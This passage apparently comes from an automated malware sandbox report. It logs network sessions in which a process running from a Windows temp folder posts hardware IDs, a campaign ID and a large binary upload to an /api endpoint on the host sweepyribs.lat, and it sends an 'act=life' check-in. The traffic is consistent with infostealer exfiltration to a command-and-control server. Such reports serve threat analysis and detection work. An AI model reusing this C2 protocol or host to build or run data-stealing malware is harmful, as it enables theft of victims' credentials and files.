2024-12-17 05:04:05 UTC	15071	OUT	Data Raw: 2d 2d 30 47 55 56 39 31 47 33 41 4d 4a 45 35 41 57 33 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 33 32 34 41 37 32 38 42 38 32 34 32 44 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 47 55 56 39 31 47 33 41 4d 4a 45 35 41 57 33 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 47 55 56 39 31 47 33 41 4d 4a 45 35 41 57 33 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d Data Ascii: --0GUV91G3AMJE5AW3BContent-Disposition: form-data; name="hwid"5C324A728B8242D2AC8923850305D13E--0GUV91G3AMJE5AW3BContent-Disposition: form-data; name="pid"2--0GUV91G3AMJE5AW3BContent-Disposition: form-data; name="lid"PsFKDg--pablo-
2024-12-17 05:04:06 UTC	1043	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3niimbghv5objcj2rhi1vuecus; expires=Fri, 11-Apr-2025 22:50:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1gzrrYfZ9vsTex4p13yorkD%2Fp5zv7S8GvdxzvU0RrTzXaliWJLcdQ%2FCR%2FBJ%2BvIpB6cGhbKzD4arcJkNp2j6KEJpPm0kxiQFoegz3QcAQwrHnvatQ%2FMXCs6MyV8AZGXoYXg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345ed2681e19aa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1785&rtt_var=684&sent=16&recv=20&lost=0&retrans=0&sent_bytes=2832&recv_bytes=16008&delivery_rate=1583514&cwnd=32&unsent_bytes=0&cid=2873fa848ad7a211&ts=823&x=0"
2024-12-17 05:04:06 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-17 05:04:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49982	104.21.2.110	443	6528	C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:08 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=BFZB2L4IIHHBWMH4JY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20567 Host: sweepyribs.lat
2024-12-17 05:04:08 UTC	15331	OUT	Data Raw: 2d 2d 42 46 5a 42 32 4c 34 49 49 48 48 42 57 4d 48 34 4a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 33 32 34 41 37 32 38 42 38 32 34 32 44 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 42 46 5a 42 32 4c 34 49 49 48 48 42 57 4d 48 34 4a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 42 46 5a 42 32 4c 34 49 49 48 48 42 57 4d 48 34 4a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f Data Ascii: --BFZB2L4IIHHBWMH4JYContent-Disposition: form-data; name="hwid"5C324A728B8242D2AC8923850305D13E--BFZB2L4IIHHBWMH4JYContent-Disposition: form-data; name="pid"3--BFZB2L4IIHHBWMH4JYContent-Disposition: form-data; name="lid"PsFKDg--pablo
2024-12-17 05:04:08 UTC	5236	OUT	Data Raw: 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 6vMMZh'F3Wun 4F([:7s~X`nO
2024-12-17 05:04:08 UTC	1037	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0lmgde4osc5q1ooor6r4lbskcu; expires=Fri, 11-Apr-2025 22:50:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PmNjA5SIii%2B2VQu3fXWR5sf7oBehjOzr4UF1QS7fRAPbqlRrso2uUAmtN8Wb0M%2FsSrkSTEKZXURPbQRoBzKBDtey3umwabjWj3nkfpCv6weW1lFFdno7FuLG8wH6opj6cA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345ee32a7d43fb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1707&rtt_var=853&sent=16&recv=26&lost=0&retrans=1&sent_bytes=4204&recv_bytes=21527&delivery_rate=136283&cwnd=180&unsent_bytes=0&cid=bc06c4317ecc1c66&ts=904&x=0"
2024-12-17 05:04:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-17 05:04:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.5	49990	104.21.2.110	443

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:10 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HXEVX09XAMOFXG3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1303 Host: sweepyribs.lat
2024-12-17 05:04:10 UTC	1303	OUT	Data Raw: 2d 2d 48 58 45 56 58 30 39 58 41 4d 4f 46 58 47 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 33 32 34 41 37 32 38 42 38 32 34 32 44 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 58 45 56 58 30 39 58 41 4d 4f 46 58 47 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 58 45 56 58 30 39 58 41 4d 4f 46 58 47 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 48 58 45 56 58 Data Ascii: --HXEVX09XAMOFXG3Content-Disposition: form-data; name="hwid"5C324A728B8242D2AC8923850305D13E--HXEVX09XAMOFXG3Content-Disposition: form-data; name="pid"1--HXEVX09XAMOFXG3Content-Disposition: form-data; name="lid"PsFKDg--pablo--HXEVX
2024-12-17 05:04:10 UTC	1035	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=acmatevqp1c86tchh8vs4jlrcf; expires=Fri, 11-Apr-2025 22:50:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0sInMjUBqWEdwfunLVyCI9qGmep7FZazlpkoCQYHkoAtz4OUK8gPk72l4%2FcJwVVOki5b%2FXfnqr1QjJYXPHD3s6hDfyK1KcP1z0X8BZI1szF9PS1t1JwcXtFU5KNw84Leow%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345ef0d80b435b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1671&rtt_var=630&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2215&delivery_rate=1732937&cwnd=214&unsent_bytes=0&cid=e5752f7668baf0b4&ts=763&x=0"
2024-12-17 05:04:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-17 05:04:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.5	49996	104.21.2.110	443

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:12 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sweepyribs.lat
2024-12-17 05:04:12 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-17 05:04:13 UTC	1035	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=aqf3a1n679a9g98jd5rtmnm078; expires=Fri, 11-Apr-2025 22:50:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R9BNl2rWzx5PidJ0fwuXN86vyUYmEgbtWVSl%2Fem22ov622MutIUkVQpoUvi5nQp2snATehfoac77PRjgobZU%2FRTGk2jegiHLZ5VIx2I8NY2DMDM43VhEwvdBCYXYZSNPhg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345effffe17d1a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1784&rtt_var=681&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=905&delivery_rate=1593886&cwnd=179&unsent_bytes=0&cid=c7543ec8f55d8d2b&ts=1017&x=0"
2024-12-17 05:04:13 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-17 05:04:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.5	49997	104.21.2.110	443

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:12 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JWH8D1AZGP8CYN5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 596050 Host: sweepyribs.lat
2024-12-17 05:04:12 UTC	15331	OUT	Data Raw: 2d 2d 4a 57 48 38 44 31 41 5a 47 50 38 43 59 4e 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 33 32 34 41 37 32 38 42 38 32 34 32 44 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4a 57 48 38 44 31 41 5a 47 50 38 43 59 4e 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 57 48 38 44 31 41 5a 47 50 38 43 59 4e 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4a 57 48 38 44 Data Ascii: --JWH8D1AZGP8CYN5Content-Disposition: form-data; name="hwid"5C324A728B8242D2AC8923850305D13E--JWH8D1AZGP8CYN5Content-Disposition: form-data; name="pid"1--JWH8D1AZGP8CYN5Content-Disposition: form-data; name="lid"PsFKDg--pablo--JWH8D
2024-12-17 05:04:12 UTC	15331	OUT	Data Raw: 37 0f a4 a3 28 95 2f df 10 17 47 2e 15 72 ea 0a 43 a4 e6 82 d9 19 48 fb 01 5e 2b b7 d7 1a b7 2e c5 7d e1 3b 13 60 fe 48 31 51 76 eb a7 2c f9 a9 af ec b5 1d 8f 0b b7 b4 fa c2 5e f9 0b fc d6 95 4c ea f9 26 8c 32 34 1f ad 21 2c 96 4a 8d cb 4a 94 a4 5b b9 42 17 d3 24 13 d6 b2 17 c6 e7 85 34 9c 5a 96 3a 6a 45 72 94 a7 f4 85 28 f7 eb 61 09 49 c9 ed 4c e5 18 58 28 d9 97 69 78 e3 84 34 98 90 83 f5 c3 e9 99 82 6b 65 7c b0 cf 56 a5 97 83 1f af 75 50 11 7c c3 ae 69 d8 c3 df f8 b8 72 c8 58 3b 2a b8 16 40 42 77 e9 c2 5b ab 26 92 e8 39 ec da f7 bc 75 b7 16 25 d6 6e 7e b0 7a 61 4d a3 17 a2 e5 c9 de 80 6d ab 8b 8a f9 0e 04 37 0a 8c 9f 5c 38 f0 ae 4b 13 54 8c a5 3e 7c fd 65 fd 98 d3 03 7b ae 9f cd 6b ff 6c 88 3d d7 73 61 f6 d9 fb 0b 48 02 1d ff b3 06 f2 be e9 36 b0 6b bc Data Ascii: 7(/G.rCH^+.};`H1Qv,^L&24!,JJ[B$4Z:jEr(aILX(ix4ke\|VuP\|irX;*@Bw[&9u%n~zaMm7\8KT>\|e{kl=saH6k
2024-12-17 05:04:12 UTC	15331	OUT	Data Raw: 3f 30 23 fc 11 53 48 c3 81 79 b8 75 74 54 d3 59 a1 bb d4 82 ec 0a 29 b0 7f 3f 45 51 8c b2 c6 07 8e ec 55 af 0f ce bf a5 dc 25 2a b4 0b f3 fc 7e d2 3c 4b 73 f8 b8 b4 b9 7f 5a c9 d6 ef ff 0a b9 9d 8b 31 ca a9 a1 43 3f df 47 72 0a 9f 4e 56 bd 7f 2b 15 20 e4 c9 49 af be 45 37 aa 48 e5 78 f7 85 dd 7e 34 27 37 70 25 a3 3a 66 7c da ee 8b 08 c7 2b 21 98 d8 45 1f 3b 14 92 90 16 ae ec 8a 16 1b d2 18 6a ee c9 2b c3 4a 90 37 d6 72 99 15 b6 76 f9 9e 62 bf 54 a8 55 cd 94 34 b4 0e ac fb ef f5 3d 98 28 fd 24 0d 87 b2 75 1f 61 9a 8a 56 4e be 95 5c 14 3f bf 4b 6b 4d f2 52 22 f9 d4 70 de 7c 4d 28 b7 42 85 43 2b 88 89 30 4a 71 5f 7e 64 41 2d c5 4e 4a d7 7b 18 9b c6 ed 7d 98 d0 1e ea a6 dc 14 4b 42 2a 4c 7e 33 09 f0 70 92 32 bc 7c 45 6f fa 97 c4 e4 47 ed 4d 72 e5 e4 cb 27 df Data Ascii: ?0#SHyutTY)?EQU%~<KsZ1C?GrNV+ IE7Hx~4'7p%:f\|+!E;j+J7rvbTU4=($uaVN\?KkMR"p\|M(BC+0Jq_~dA-NJ{}KBL~3p2\|EoGMr'
2024-12-17 05:04:12 UTC	15331	OUT	Data Raw: 14 66 da 17 d6 08 3b 6c ae 0c 5c dc 59 3a 74 8b 44 37 4e 9b cc 59 e4 07 8e a8 5a 10 59 7f bc 3f 5b 1d 30 fc 72 e8 fd 83 cc db 05 a6 05 79 b6 c9 6d 62 58 15 10 1c 71 ed b2 99 79 e1 5c 51 be d7 16 7d 16 a3 15 af 19 de 14 6b 0d c1 5d 0b 79 cc dd c1 19 29 76 03 aa ac 4e 4b 09 61 cc 6f 2c fe 61 26 8a cc 35 15 17 54 1f 56 bd fa 2d 91 2a 0f f6 63 9c a0 8c 2a 48 4d 0b 33 7f db dc 7f ed 55 37 a2 70 d3 e2 3e 84 3d 37 10 60 4f f9 90 7a b3 ed c8 d2 31 22 d7 ef b6 19 a3 be 40 cc 53 1a 0b 7f 22 dd 3f 3f 2b 0e 0b 4b f0 5b e3 ba b8 71 20 8f 56 d5 2f e6 cc f4 0f 91 91 02 93 a1 9b 5c ae 8a ed af ff 67 78 e8 2d 4c 9b e9 62 f4 06 30 45 09 df d0 15 7f fa bf c5 ed db 7f 02 fa 9e fb 2d b9 25 d5 7b a6 36 99 e7 b6 b4 bf bd 4b 78 bb 4a 3b 18 9c 13 89 e7 ae 9b 66 1e 11 db c3 75 53 Data Ascii: f;l\Y:tD7NYZY?[0rymbXqy\Q}k]y)vNKao,a&5TV-cHM3U7p>=7`Oz1"@S"??+K[q V/\gx-Lb0E-%{6KxJ;fuS
2024-12-17 05:04:12 UTC	15331	OUT	Data Raw: ee e4 db 64 b3 42 09 26 41 a4 51 61 94 5b 2f 38 e6 1a ed 59 68 bb 82 9d 89 07 ee 6e 10 3e d3 75 38 7f df e3 8d 86 33 5a 4b ea 73 25 c5 1e fc 02 7f de 91 3e f9 1d 6d 8c d6 f5 9f 6b b0 0f 7a 24 95 24 2c f2 7b 6b a2 de 04 e7 c3 21 72 d3 8d 35 73 35 55 4f be ee a0 ad 8e 97 6b f4 c6 76 b8 e2 e9 87 df 29 96 f4 71 cf 02 f1 d6 b5 b3 82 36 7d 2a 6a 59 19 c3 9b 40 54 45 c7 4a bf c3 11 bc b0 49 67 9f 30 dc 3c 28 1e 24 70 69 bf d3 79 61 f2 92 2b eb f0 ce 75 22 f8 ab e0 a1 da 0d 07 8d 64 04 09 ec 22 7e 35 c5 11 33 ab d6 4a 89 71 be 75 81 a2 13 a7 e8 96 ad 98 e7 c7 da be 49 48 33 ad 3b 54 e3 47 b7 34 3d 35 e4 50 93 bd b4 89 aa d8 16 1c 93 d5 fd c8 51 ae 5f 5d 56 64 87 4d 33 31 53 39 95 d6 fa e6 61 53 84 51 b7 bd 27 38 0d 72 77 d7 39 e8 26 f6 db 66 29 f4 46 05 72 fe 34 Data Ascii: dB&AQa[/8Yhn>u83ZKs%>mkz$$,{k!r5s5UOkv)q6}*jY@TEJIg0<($piya+u"d"~53JquIH3;TG4=5PQ_]VdM31S9aSQ'8rw9&f)Fr4
2024-12-17 05:04:12 UTC	15331	OUT	Data Raw: 15 69 bb b5 cf 69 8d 80 a5 26 ad 2c 3d cc 00 0e 7f b1 d5 ee d5 de fe 23 e6 85 37 a0 21 07 43 55 1b 97 2f 04 3e 88 a0 aa 18 4c 0f 7e 3e 37 d1 58 77 f6 b2 03 20 39 04 47 84 ae 1f 19 cf a2 27 34 90 a7 04 5b f1 ef 24 68 48 4d f7 e5 ce 3f 4d 6c 34 fb c4 90 23 0f 4f da 8e 29 f6 77 3c 0d 3d 7a cd ec 0a 77 c7 b4 32 23 bc f8 dd 93 78 0a 36 02 13 b3 6e e2 ac e4 52 17 11 d2 bd e7 5e 91 e0 b6 bb ee 09 f0 b1 c3 46 7a 05 9a 23 98 91 00 df e9 33 f8 98 76 a7 8a 0d 1f 41 52 5f 78 b2 36 f2 6c 95 a4 dc c6 b8 7b 75 f2 34 cc 8c 86 c7 00 b8 39 aa 98 a1 98 36 48 48 e6 dc 8f 2e fa df f4 50 33 10 b2 de 21 4b 5b 7e 82 24 32 fe 32 6e a9 5a 4c a4 3e 4c 13 f5 3c b7 fa ca cd 12 71 e0 c0 91 1f 94 ca a1 1f 14 11 c0 5a 96 02 ff f2 b3 3a fe e1 f7 df 07 28 6d bd e7 81 1b 3d 2d 9c 26 c0 f8 Data Ascii: ii&,=#7!CU/>L~>7Xw 9G'4[$hHM?Ml4#O)w<=zw2#x6nR^Fz#3vAR_x6l{u496HH.P3!K[~$22nZL>L<qZ:(m=-&
2024-12-17 05:04:12 UTC	15331	OUT	Data Raw: 7b d6 7d 56 6a ce d7 46 9b 99 ff 24 3f 4d 3a dd 19 64 ec a8 5a a9 d1 3e b5 b1 b0 38 b1 e9 3d c1 59 e4 fc 58 7e af 7a 36 ea dc f1 03 51 34 25 f1 6a 33 0a 3d d1 d0 c6 15 23 c2 fe 7b 00 a3 cd 91 bd 8b 75 37 ea 9c 7d a2 cf 55 d3 f3 39 3e d0 f8 d6 cf cb 5a 36 c2 fc 68 b5 8c 0a 0f 90 db 64 0f 1f 2b 8b de b0 1e 54 3c 1f 18 e1 2f 38 fb 45 06 cb 7f ef 14 b6 73 df 5e 46 a2 6a 13 ca 74 0c 73 6f e0 8b f8 40 38 5f 61 6a c8 b9 aa b9 59 2c e7 4a ad e6 18 b8 90 b6 c8 29 66 a3 c7 78 85 66 ee 51 7c f1 35 02 56 96 a4 41 d2 18 16 45 dc 99 e8 e5 39 2a e7 4a 38 7d ec dc 20 45 51 89 44 51 cc 50 6c 4f ae d5 fc bc 4d 70 fa 2c cd d6 26 c6 75 97 ca b8 cd b7 af 6e 5a 3f 4d f5 84 88 53 6a 2b 85 94 c4 46 f6 ce 2a 17 d9 d0 35 93 c3 14 1f 41 52 b5 02 44 75 9b 45 ca b0 c9 b9 2c 46 e7 2e Data Ascii: {}VjF$?M:dZ>8=YX~z6Q4%j3=#{u7}U9>Z6hd+T</8Es^Fjtso@8_ajY,J)fxfQ\|5VAE9J8} EQDQPlOMp,&unZ?MSj+F5ARDuE,F.
2024-12-17 05:04:12 UTC	15331	OUT	Data Raw: d5 b3 8c f4 fa f6 c6 60 91 f9 db ac 9e ba 9a 7f c6 73 f9 10 77 02 13 d7 90 4d 18 20 cf 7e 7a 9f e7 e4 55 a1 12 54 38 77 de 84 95 e0 79 e1 df 13 20 f4 d9 d9 f1 49 1e 3a f8 11 5a b0 a4 85 a8 27 46 fd fb 0c 4a 07 3b 1e 77 aa b5 44 00 9e 3d 18 a5 97 52 a8 fe 74 bb 8d 7d b6 7b 8c 77 1f ad 62 53 a0 e6 54 22 46 ec d1 c8 f7 db 6b 76 e2 36 b2 9c a4 4f 00 3f 52 42 ff 39 28 de 87 c8 4c 8b 57 f8 e7 7e d2 df df 13 9d 03 4f 80 cf d9 cf b5 8f cc db da e8 73 26 eb e6 75 8e ef a1 f3 80 8a ad 6a f8 db 87 a1 bc c7 27 9c a4 74 b4 fe 5a 21 36 7c 4f 61 32 f9 56 3d d9 f6 5f 28 e7 59 3b dc 94 85 ac 2b 0a 79 91 21 1a f7 ee f7 2d fd a5 b7 02 de a5 a7 ab 06 26 68 7a 74 27 d8 0a 7c ce f1 63 c7 a0 c5 b1 28 d4 3c 75 c7 66 6b 2c e6 4a 1a e6 7a 33 c3 21 d4 59 f0 e6 81 2d 97 91 b1 63 89 Data Ascii: `swM ~zUT8wy I:Z'FJ;wD=Rt}{wbST"Fkv6O?RB9(LW~Os&uj'tZ!6\|Oa2V=_(Y;+y!-&hzt'\|c(<ufk,Jz3!Y-c
2024-12-17 05:04:12 UTC	15331	OUT	Data Raw: ed 75 84 aa c8 fb 82 04 c2 60 53 b6 51 a8 71 32 27 63 57 dd cd b2 90 a8 06 65 aa ba a0 ba ef ca 07 a4 95 1d f9 0a f6 4d 9e da 3b e1 41 6b 45 5b 45 56 33 ef 6e a7 ea e2 ad c9 7c 87 46 3f b9 50 5d aa 61 f9 26 96 ee c7 5f 0a db d0 d1 34 19 15 b1 e8 f3 ce 2f 37 32 0a 90 33 7c 85 05 28 71 4c 6c 84 02 82 d3 39 93 01 53 27 bc 37 67 f4 e1 6f da 84 d3 d2 7a d8 0b 73 60 91 21 4b 93 81 53 d1 08 bc 04 f2 a0 30 8a e1 dc 90 10 1f e7 86 a2 84 07 25 f1 66 9e 27 f2 ae 6b 8f 08 16 70 f0 d7 4c 95 f9 6a 75 27 39 37 4f c9 5d f9 80 49 bd c6 03 c6 ae ba 70 84 10 26 4e f7 e0 60 bf c3 9a d6 94 9e 93 75 5a dd 0d 55 ad 49 35 6a 63 4a f2 2d 55 a6 ff 10 48 6a f2 99 41 14 f6 14 17 d9 0c 04 df 3d d9 fb 22 a2 97 cb c9 47 5c e9 c6 19 4d 94 d7 bd ff ad 01 ff b3 d9 2d ff 00 5e bc 59 52 9a Data Ascii: u`SQq2'cWeM;AkE[EV3n\|F?P]a&_4/723\|(qLl9S'7gozs`!KS0%f'kpLju'97O]Ip&N`uZUI5jcJ-UHjA="G\M-^YR
2024-12-17 05:04:12 UTC	15331	OUT	Data Raw: 0b ff 71 cd 87 eb 51 e6 3d c3 dd 9b 97 da 08 2a 5b 14 6d 3a 1c 45 89 f2 29 01 3e fe fa d2 04 53 83 06 b2 f9 b9 40 6d 13 23 29 21 de ee 47 c4 4b e0 11 49 52 e6 97 22 52 1c 07 b1 62 52 93 50 3f 9c b5 f7 c6 b5 e2 53 da a0 ce 2b 14 ef 8d 0f ee a8 de 36 ee b7 bf 04 29 71 0b 55 24 a4 89 36 06 fc 3e 43 38 01 21 c1 31 f9 ec 65 41 1a 3c 47 4e 3e d4 20 1e ca a9 b1 0f 0f e9 73 a7 72 cd a7 cf 59 3e 25 08 83 fb 96 72 7b 94 0f c0 19 58 f4 ce 1d be c4 45 a3 64 71 b1 ee 1b 6c 47 f1 e9 23 4f 81 29 ca 6f 76 bb e0 3a 4a db 44 ef 64 ca de 35 36 76 2f 37 e2 8a e8 9b 02 20 c2 f3 e8 65 18 82 4d 7a 0b 9b 1e c0 bd fd b9 74 c9 80 bb 84 78 74 35 eb 9c 51 1d e1 48 0c 4f 56 45 bb 59 c8 0c a2 41 c8 c3 c8 c4 f8 b5 60 47 f2 a1 ef 54 89 89 03 0d bf 8a 89 d7 b2 34 ac 46 d3 ee ca bd c7 32 Data Ascii: qQ=*[m:E)>S@m#)!GKIR"RbRP?S+6)qU$6>C8!1eA<GN> srY>%r{XEdqlG#O)ov:JDd56v/7 eMztxt5QHOVEYA`GT4F2
